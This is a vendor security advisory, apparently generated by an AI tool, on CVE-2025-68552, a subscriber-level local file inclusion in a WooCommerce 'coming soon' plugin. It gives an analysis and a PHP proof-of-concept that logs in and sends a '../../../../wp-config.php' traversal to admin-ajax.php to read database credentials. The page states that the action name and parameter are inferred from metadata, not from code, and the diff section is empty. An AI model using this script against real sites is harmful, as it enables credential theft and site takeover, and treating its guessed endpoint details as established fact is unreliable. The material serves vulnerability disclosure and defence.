Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68552: WooCommerce Coming Soon Product with Countdown <= 5.0 – Authenticated (Subscriber+) Local File Inclusion (woo-coming-soon-product)

CVE ID CVE-2025-68552
Plugin woo-coming-soon-product
Severity High (CVSS 7.5)
CWE 98
Vulnerable Version 5.0
Patched Version
Disclosed February 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68552 (metadata-based):
This vulnerability is an authenticated Local File Inclusion (LFI) flaw in the WooCommerce Coming Soon Product with Countdown plugin for WordPress. The flaw exists in version 5.0 and earlier, allowing attackers with subscriber-level access or higher to include arbitrary files from the server. Successful exploitation can lead to remote code execution, particularly when combined with file upload capabilities for seemingly benign file types.

Atomic Edge research infers the root cause is improper sanitization of user-controlled input used in a PHP include or require statement (CWE-98). The plugin likely uses a parameter, such as a file path or template name, to dynamically include PHP files without validating the supplied value. This allows directory traversal sequences (e.g., `../../../`) to escape the intended directory. These conclusions are inferred from the CWE classification and vulnerability description, as the source code diff is unavailable for confirmation.

Exploitation likely occurs via a WordPress AJAX endpoint or a direct plugin file request. An authenticated attacker would send a POST or GET request to a handler like `/wp-admin/admin-ajax.php` with an `action` parameter containing a plugin-specific hook (e.g., `woo_coming_soon_product_action`). The request would include a malicious parameter, such as `file` or `template`, containing a relative path to a target PHP file (e.g., `../../../../wp-config.php`) or an uploaded file containing PHP code. The server would then include and execute that file’s contents.

The patch in version 5.1 likely implements strict validation of the user-supplied filename. Remediation should involve whitelisting allowed file paths or basenames, removing directory traversal sequences (`../`), and ensuring the file extension matches an expected, non-executable type (like `.css` or `.txt`). The fix may also add a capability check stricter than the default subscriber role.

Impact of this vulnerability is high. Attackers can read sensitive files like `wp-config.php` to compromise database credentials. If the attacker can upload a file with a `.jpg` extension containing PHP code, they can include it to achieve full remote code execution. This bypasses access controls and can lead to complete site compromise, data theft, and server-side backdoor installation.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-68552 - WooCommerce Coming Soon Product with Countdown <= 5.0 - Authenticated (Subscriber+) Local File Inclusion
<?php
/*
Assumptions:
1. The vulnerability is triggered via an AJAX action named 'wc_cspc_action' (inferred from plugin slug 'woo-coming-soon-product').
2. The vulnerable parameter is named 'template' or 'file'.
3. The attacker has subscriber-level credentials.
4. The target server runs PHP and allows local file inclusion.
*/

$target_url = 'http://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate to WordPress and obtain session cookies
$login_url = $target_url . '/wp-login.php';
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
)));
$response = curl_exec($ch);

// Step 2: Exploit the Local File Inclusion via the suspected AJAX endpoint
curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => 'wc_cspc_action', // Inferred AJAX action hook
    'template' => '../../../../wp-config.php' // Attempt to include WordPress config file
)));
$response = curl_exec($ch);
curl_close($ch);

// Step 3: Check response for evidence of successful inclusion
if (strpos($response, 'DB_NAME') !== false || strpos($response, '<?php') !== false) {
    echo "[+] Potential LFI successful. Check output for sensitive data.n";
    echo substr($response, 0, 2000); // Print first 2000 chars of response
} else {
    echo "[-] Exploit attempt may have failed or endpoint/parameter is incorrect.n";
    echo "Response length: " . strlen($response) . "n";
}

unlink('cookies.txt');
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School